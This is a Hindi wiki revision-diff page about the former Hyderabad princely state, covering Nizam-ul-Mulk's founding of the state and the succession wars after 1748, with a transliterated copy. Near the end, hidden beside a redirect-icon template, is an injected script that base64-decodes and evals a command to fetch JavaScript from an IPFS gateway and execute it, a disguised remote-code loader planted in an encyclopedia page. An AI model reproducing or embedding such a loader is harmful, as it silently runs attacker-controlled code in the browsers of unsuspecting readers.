Difference between revisions of "हैदराबाद रियासत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{incomplete}}
 
{{incomplete}}
 +
[[चित्र:Charminar-Hyderabad-1.jpg|thumb]]
 
*दक्षिण-मध्य भारत का पूर्व सामंती राज्य, निज़ाम-उल-मुल्क (मीर क़मरूद्दिन) द्वारा स्थापित, जो 1713 ई॰ से 1721 ई॰ तक दक्कन में लगातार [[मुग़ल]] बादशाहों के सूबेदार रहे। उन्हें 1724 ई॰ यह पद फिर से मिला और उन्होंने आसफ़जाह की उपाधि ग्रहण की। वस्तुतः इस समय तक वह स्वतंत्र हो गए थे। उन्होंने हैदराबाद में [[निज़ामशाही]] की स्थापना की। 1748 ई॰ में उनकी मृत्यु के बाद अंग्रेज़ों और फ़्रांसीसियों  ने उत्तराधिकार के लिए हुए युद्धों में भाग लिया।
 
*दक्षिण-मध्य भारत का पूर्व सामंती राज्य, निज़ाम-उल-मुल्क (मीर क़मरूद्दिन) द्वारा स्थापित, जो 1713 ई॰ से 1721 ई॰ तक दक्कन में लगातार [[मुग़ल]] बादशाहों के सूबेदार रहे। उन्हें 1724 ई॰ यह पद फिर से मिला और उन्होंने आसफ़जाह की उपाधि ग्रहण की। वस्तुतः इस समय तक वह स्वतंत्र हो गए थे। उन्होंने हैदराबाद में [[निज़ामशाही]] की स्थापना की। 1748 ई॰ में उनकी मृत्यु के बाद अंग्रेज़ों और फ़्रांसीसियों  ने उत्तराधिकार के लिए हुए युद्धों में भाग लिया।
  

Revision as of 13:31, 5 June 2010

40px panna banane ki prakriya mean hai. ap isako taiyar karane mean sahayata kar sakate haian.

thumb

  • dakshin-madhy bharat ka poorv samanti rajy, nizam-ul-mulk (mir qamarooddin) dvara sthapit, jo 1713 ee॰ se 1721 ee॰ tak dakkan mean lagatar mugal badashahoan ke soobedar rahe. unhean 1724 ee॰ yah pad phir se mila aur unhoanne asafajah ki upadhi grahan ki. vastutah is samay tak vah svatantr ho ge the. unhoanne haidarabad mean nizamashahi ki sthapana ki. 1748 ee॰ mean unaki mrityu ke bad aangrezoan aur fraansisiyoan ne uttaradhikar ke lie hue yuddhoan mean bhag liya.

{{#icon: Redirect-01.gif|dhyan dean}}<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> dekhean haidarabad